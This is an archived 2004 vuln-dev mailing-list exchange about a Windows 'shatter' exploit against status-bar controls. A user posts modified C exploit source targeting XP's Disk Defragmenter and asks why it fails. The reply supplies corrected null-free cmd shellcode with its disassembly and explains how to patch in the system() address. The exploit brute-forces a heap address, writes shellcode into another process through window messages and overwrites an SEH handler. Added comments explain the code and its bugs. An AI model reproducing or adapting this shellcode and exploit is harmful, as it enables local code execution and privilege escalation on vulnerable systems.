
RE: status-bar SHATTER attack


From: "Brett Moore" <brett.moore () security-assessment com>
Date: Thu, 8 Jul 2004 10:29:54 +1200

Hey,

can anyone pls point me where i'm wrong ??
Sure

Original demo states
// Local No Null Cmd Shellcode.

This is because you can't send 0x00 with this statusbar exploit

Your shellcode contains nulls.

Try this code which is updated to use a system address of 0x77c28044
=
"\x90\x33\xc9\x66\xb9\x36\x32\xc1\xe1\x09\x66\xb9\x63\x6d\x51\x54\xbb\xe1\x1
2\x5e\x77\x03\xd9\xff\xd3\xcc\x90";

And remove your code that plugs the address into the shellcode.

Or you can be smart and keep your shellcode modification code but update it
so it affects the shellcode correctly.

_exploit
00408030 90                   nop
00408031 33 C9                xor         ecx,ecx
00408033 66 B9 36 32          mov         cx,3236h
00408037 C1 E1 09             shl         ecx,9
0040803A 66 B9 63 6D          mov         cx,6D63h
0040803E 51                   push        ecx
0040803F 54                   push        esp
00408040 BB 5C 21 9D 77       mov         ebx,775e125eh
00408045 03 D9                add         ebx,ecx
00408047 FF D3                call        ebx
00408049 CC                   int         3

So grab the address of system and subtract 0x646DE6 (cmd) then place into
the byte array.
or
Remove the add ebx,ecx bytes and just put the proc address straight in
or
write your own shellcode, pretty sure I did it this way because at the time
system had a
null in its address.

Either way, the code you sent works fine with that updated shellcode.

Be sure to grab my shatter presentation+code from the Blackhat site after
the conference if this stuff interests you. It will contain previously
unreleased information and techniques.

Brett Moore
Network Intrusion Specialist, CTO
Security-Assessment.com Ltd
www.security-assessment.com

-----Original Message-----
From: bil_912 [mailto:bil_912 () coolgoose com]
Sent: Thursday, July 08, 2004 10:00 AM
To: vuln-dev () securityfocus com
Subject: status-bar SHATTER attack




hello all,

recently i was playing with >> STATUS-BAR <<
shatter-attack-code provided
by brett.moore () security-assessment com

the code with tiny modifications is attached here.

the problem is ...

xp.sp1 TOP SEH at 0x77ed73b4 was getting overwritten with 0x77ed74c0, where
my shellcode is residing.

but even after that the code didn't get executed. i was attacking the
"disk defragmenter" utility which comes with windows XP.

can anyone pls point me where i'm wrong ??

thank u.

[ i'm attaching a screen-shot of my desktop when attacking ]


//=========================================================================

/***************************************************************************
* Statusbar Control Shatter exploit
*
* Demonstrates the use of a combination of windows messages to:
* - brute force a useable heap address
* - place structure information inside a process
* - inject shellcode to known location
* - overwrite 4 bytes of a critical memory address
*
* 4 Variables need to be set for proper execution.
* - tWindow is the title of the programs main window
* - sehHandler is the critical address to overwrite
* - shellcodeaddr is the data space to inject the code
* - heapaddr is the base heap address to start brute forcing
*
* Local shellcode is Win2kSp4 ENG Hardcoded because of unicode issues
* Try it out against any program with a progress bar
*

 ***************************************************************************/

#include <windows.h>
#include <commctrl.h>
#include <stdio.h>

// Local No Null Cmd Shellcode.
// Bytes copied into the target one at a time by the loop in IterateWindows().
// 15 escaped bytes plus the implicit string terminator, so sizeof(exploit) == 16
// and the write loop sends the terminator as well.
// Offsets 8..11 (the bytes following the 0xB9 opcode byte at offset 7) are
// overwritten by main() with the address returned by GetProcAddress(..., "system").
// NOTE(review): offset 5 is a 0x00 byte (the terminator of "cmd"), despite the
// "No Null" comment above; the reply at the top of this thread points that out.
BYTE exploit[]
="\x90\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1\xcc";

char g_classNameBuf[ 256 ];          // scratch for GetClassName() in IterateWindows()
char tWindow[]="disk defragmenter";  // window title looked up by FindWindow() in main()

long sehHandler = 0x77ed73b4; // Critical Address To Overwrite -- hard-coded for one OS build (the mail above says XP SP1)
long shellcodeaddr = 0x77ed74c0; // Known Writeable Space Or Global Space -- destination of the exploit[] bytes
unsigned long heapaddr = 0x00100000; // Base Heap Address -- start of the BruteForceHeap() scan; argv[1] can override it
long mainhWnd;                       // HWND of the found main window, kept as a long
                                     // NOTE(review): long is 32-bit on Win64, so an HWND stored here would truncate there

// Forward declarations.
// NOTE(review): BruteForceHeap is declared here with one parameter and called that
// way in IterateWindows(), but the definition further down takes three; the two
// do not agree.
void doWrite(HWND hWnd, long tByte,long address);
void BruteForceHeap(HWND hWnd);
void IterateWindows(long hWnd);

/*
 * Entry point.
 * argv[1] (optional): starting heap address in hex, parsed into heapaddr with %lx.
 * Resolves msvcrt!system in this process and patches it into exploit[], finds the
 * target's main window by title and hands it to IterateWindows(). Returns 0 on
 * every path, including "window not found".
 * NOTE(review): everything below rests on an arbitrary process on the same desktop
 * being allowed to SendMessage() to the target's windows; keeping privileged UI off
 * a desktop shared with lower-privilege code (or message filtering between
 * privilege levels, as later Windows versions added) is the defensive angle.
 */
int main(int argc, char *argv[])
{

   HMODULE hMod;
   DWORD ProcAddr;
   long x;   // unused


   //making the shellcode ready
   // Writes the locally resolved address over bytes 8..11 of exploit[]; only
   // meaningful if the target maps msvcrt.dll at the same base as this process.
   // hMod is not checked; a failed lookup leaves ProcAddr 0 and skips the patch.
   hMod = LoadLibrary("msvcrt.dll");
   ProcAddr = (DWORD)GetProcAddress(hMod, "system");
   if(ProcAddr != 0)
         *(long *)&exploit[8] = ProcAddr;
   //***************************

   //printf("+ Enter Window Title\n",tWindow);
   //flushall();
   //gets(tWindow);



   // Optional override of the scan start. The sscanf result is not checked, so a
   // non-hex argument leaves heapaddr at its default.
   if (argc == 2)
   sscanf(argv[1],"%lx",&heapaddr);// Oddity

   printf("%% Using base heap address...0x%xh\n",heapaddr);
   printf("+ Finding %s Window...\n",tWindow);
   // Title lookup on the caller's desktop; the HWND is stored in a long.
   mainhWnd = (long)FindWindow(NULL,tWindow);

   if(mainhWnd == NULL)   // NOTE(review): a long compared against the NULL pointer constant
   {
      printf("+ Couldn't Find %s Window\n",tWindow);
      return 0;
   }
   printf("+ Found Main Window At......0x%xh\n",mainhWnd);
   IterateWindows(mainhWnd);
   printf("+ Done...\n");

   return 0;
}


/*
 * Depth-first walk of the windows under hWnd: children first (GW_CHILD), then
 * their siblings (GW_HWNDNEXT), then hWnd itself. For the first window whose
 * class name is "msctls_statusbar32" it runs the full sequence from the file
 * header against that control and then calls exit(0), so at most one status
 * bar is ever used.
 * hWnd is carried as a long and cast back to HWND at every API call.
 */
void IterateWindows(long hWnd)
{

long childhWnd,looper;

// Recurse into every child before examining this window.
childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);
while (childhWnd != NULL)
{
IterateWindows(childhWnd);
childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT);
}

GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) );
if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0)
{

// Find Heap Address
// Leaves the result in the global heapaddr, which doWrite() reads.
// NOTE(review): called with one argument but defined below with three.
BruteForceHeap((HWND) hWnd);
//printf("+ Enter heapaddr : \n");
//scanf("%lx",&heapaddr);

// Inject shellcode to known address
// One doWrite() per byte; sizeof(exploit) counts the trailing '\0', so the
// terminator is sent too. looper (long) is compared against a size_t here.
printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr);
for (looper=0;looper<sizeof(exploit);looper++)
 doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper));
// Overwrite SEH
// shellcodeaddr is written one byte at a time, least significant byte first.
printf("+ Overwriting Top SEH.......0x%xh\n",sehHandler);


doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler);
doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1);
doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2);
doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3);



// Cause exception
// Both messages pass 1 where the control expects a pointer; per the comment
// above that is presumably what raises the exception the overwritten SEH entry
// then handles.
printf("+ Forcing Unhandled Exception\n");
getch();   // waits for a keypress; needs <conio.h>, which this file does not include

SendMessage((HWND) hWnd,(UINT) PBM_GETRANGE,0,1);  //PROGRESSS_BAR
SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1);

printf("+ Done...\n");
exit(0);   // stops after the first status bar; exit() needs <stdlib.h>, not included here
}
}

/*
 * Scans upward from the global heapaddr in steps of 2500 bytes, looking for the
 * address at which the target keeps the copy of its main window title.
 * Each probe: fill buffer, make it the main window's title (WM_SETTEXT), tell the
 * status bar its part text lives at heapaddr (SB_SETTEXT with heapaddr as the
 * lParam instead of a string pointer) and read the length back
 * (SB_GETTEXTLENGTH). A fill of 0x58 ('X') is expected to report length 1 and a
 * fill of 0x80 a length greater than 1; why the two fills differ is not
 * explained in this file. On success heapaddr is left at the found address.
 * NOTE(review): the loop has no upper bound, so a miss never terminates.
 * NOTE(review): the three-parameter signature does not match the one-parameter
 * prototype and call site; tByte and address are unused, and return(0) in a
 * void function is invalid C.
 */
void BruteForceHeap(HWND hWnd, long tByte,long address)
{
long retval;
BOOL foundHeap = FALSE;   // never set to TRUE; the loop only exits via return
char buffer[5000];
memset(buffer,0,sizeof(buffer));

while (!foundHeap)
{
printf("+ Trying Heap Address.......0x%xh ",heapaddr);

memset(buffer,0x58,sizeof(buffer)-1); // settin to X (last byte stays '\0')

// Set Window Title
// &buffer has type char (*)[5000]; it is passed as the LPARAM without a cast.
SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);
// Set Part Contents
SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr);
retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0);
printf("%d",retval);

if(retval == 1)
{
// First Retval should be 1
// Second probe with a different fill byte, same message sequence.
memset(buffer,0x80,sizeof(buffer)-1);
// Set Window Title
SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);
// Set Part Contents
SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr);
retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0);
if(retval > 1)
{
// Second should be larger than 1
printf(" : %d - Found Heap Address : 0x%x\n",retval,heapaddr);
return(0);
}
}
printf("\n");
heapaddr += 2500;   // decimal step, so the scan is not page-aligned
}
}


/*
 * The write primitive: stores the byte value tByte at address inside the target,
 * using the status bar control hWnd.
 * Steps: fill buffer with tByte (the last byte stays '\0') and make it the main
 * window's title, so the same bytes presumably end up at heapaddr (the location
 * BruteForceHeap() settled on); SB_SETPARTS with heapaddr as the lParam makes the
 * control read its single part boundary from that copy; SB_GETPARTS with address
 * as the lParam then makes the control store that boundary value at address.
 * With one part the stored value is a 32-bit int, which is why the callers in
 * IterateWindows() advance address by one per byte.
 * tByte: byte value, passed as long and narrowed by memset().
 * address: target address, handed to the control as a raw pointer.
 */
void doWrite(HWND hWnd, long tByte,long address)
{
char buffer[5000];

memset(buffer,0,sizeof(buffer));
memset(buffer,tByte,sizeof(buffer)-1);
// Set Window Title
// &buffer (char (*)[5000]) is passed as the LPARAM without a cast.
SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);

// Set Statusbar width
SendMessage( hWnd,(UINT) SB_SETPARTS,1,heapaddr);
SendMessage( hWnd,(UINT) SB_GETPARTS,1,address);

}


//=========================================================================


######################################################################
CONFIDENTIALITY NOTICE: 

This message and any attachment(s) are confidential and proprietary. 
They may also be privileged or otherwise protected from disclosure. If 
you are not the intended recipient, advise the sender and delete this 
message and any attachment from your system. If you are not the 
intended recipient, you are not authorised to use or copy this message 
or attachment or disclose the contents to any other person. Views 
expressed are not necessarily endorsed by Security-Assessment.com 
Limited. Please note that this communication does not designate an 
information system for the purposes of the New Zealand Electronic 
Transactions Act 2003.
######################################################################

